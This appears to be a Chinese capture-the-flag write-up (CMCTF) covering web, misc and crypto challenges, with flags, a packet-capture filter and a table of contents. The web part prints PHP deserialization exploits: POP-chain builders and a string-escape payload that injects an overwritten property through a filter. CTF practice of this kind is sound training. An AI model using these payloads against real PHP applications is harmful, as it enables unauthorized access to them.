WEB

pop

<?php
class A1
{
    public $a1;
}
class A2
{
    public $a2 = '10086';

}
class A3
{
    public $a3;

}
class A4
{
    public $a4;

}

$a=new A1();
$a->a1=new A2();
$a->a1->a2=new A3();
$a->a1->a2->a3=new A4();
echo urlencode(serialize($a));

GET:2025=admin&wlaq=O:2:"A1":1:{s:2:"a1";O:2:"A2":1:{s:2:"a2";O:2:"A3":1:{s:2:"a3";O:2:"A4":1:{s:2:"a4";N;}}}}

CM{9CB0EFFC970B3870705A5DA1E85E242C}

busy_search

扫目录发现index.html，源码分别搜{、_、}找到flag

flag{yong_chu_xuelian}

can_u_escape

<?php
include("flag.php");
highlight_file(__FILE__);
function filter($name){
    $safe=array("flag","php");
    $name=str_replace($safe,"hake",$name);
    return $name;
}
class test{
    var $user;
    var $pass='daydream';
    function __construct($user){
        $this->user=$user;
        
    }
}
$param=$_GET['a'];
$param=serialize(new test($param));
$profile=unserialize(filter($param));
if ($profile->pass=='escaping'){
    echo $flag;
}

?>

<?php
function filter($name){
    $safe=array("flag","php");
    $name=str_replace($safe,"hake",$name);
    return $name;
}
class test{
    var $user='phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}';
    var $pass='daydream';
}
$a=new test();
echo serialize($a);
echo "\n";
//O:4:"test":2:{s:4:"user";N;s:4:"pass";s:8:"daydream";}
echo filter(serialize($a));
//O:4:"test":2:{s:4:"user";s:116:"phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"daydream";}
//O:4:"test":2:{s:4:"user";s:116:"hakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehakehake";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"daydream";}

GET:a=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}

WSCTF{9_kuai_big_bottle_ulog_tee}

1give!me!money!

1u_know?

//shop.php
<?php
highlight_file(__FILE__);
include("change.php");
$buy=$_GET['buy'];
$un_buy=unserialize($buy);
$gift1="xiaomisu7";
$gift2="redmiK60";
if(isset($_GET['buy'])){
    $gift1=$anotherthing;
    $gift2=$otherthing;
    
    if($un_buy['onething']==$gift1 && $un_buy['twothing']==$gift2){
        echo $flag1;
        echo "谢谢你，你是个好人";
    }
    else{

        echo "女神：“哎呀我补药买这个”";
    }
}
else{
echo "给她买什么好呢";
}

?>

exp如下

<?php
$buy=array(
    'anotherthing'=>"xiaomisu7",
    'otherthing'=>"redmiK60"
);

echo serialize($buy);

//kfc.php
<?php
class order
{
    public $start;

    function __construct($start)
    {
        $this->start = $start;
    }

    function __destruct()
    {
        $this->start->helloworld();
    }
}

class zhengcan
{
    public $lbjjrj;

    function __call($name, $arguments)
    {
        echo $this->lbjjrj->douzhi;
    }
}

class tiandian
{
    

    function __get($Attribute)
    {
        echo '';
        
    }
}

if(isset($_GET['serialize'])) {
    unserialize($_GET['serialize']);
} else {
    echo "使用压缩包点单kfc.rar";
}

<?php
class order
{
    public $start;
}

class zhengcan
{
    public $lbjjrj;
}

class tiandian
{
}

$a=new order();
$a->start=new zhengcan();
$a->start->lbjjrj=new tiandian();
echo serialize($a);
#O:5:"order":1:{s:5:"start";O:8:"zhengcan":1:{s:6:"lbjjrj";O:8:"tiandian":0:{}}}

GET:serialize=O:5:"order":1:{s:5:"start";O:8:"zhengcan":1:{s:6:"lbjjrj";O:8:"tiandian":0:{}}}

5kLCBpdCdzIGp1c3QgbXkgaW1hZ2luYXJ5IGN5YmVyIGxpZmU=

MISC

1段涵涵学姐最爱的音乐

流量分析-1

tcp.flags.syn == 1 && tcp.flags.ack == 0

CM{d28ee9d60772acbcd4eca38e1a3c94b8}

流量分析-2

CRYPTO

Base141

WSCTF{Y0u_kN0w_Ba5e_V3ry_W311}

CMCTF-WP

WEB

pop

busy_search

can_u_escape

1give!me!money!

1u_know?

MISC

1段涵涵学姐最爱的音乐

流量分析-1

流量分析-2

CRYPTO

Base141

RSA你太baby了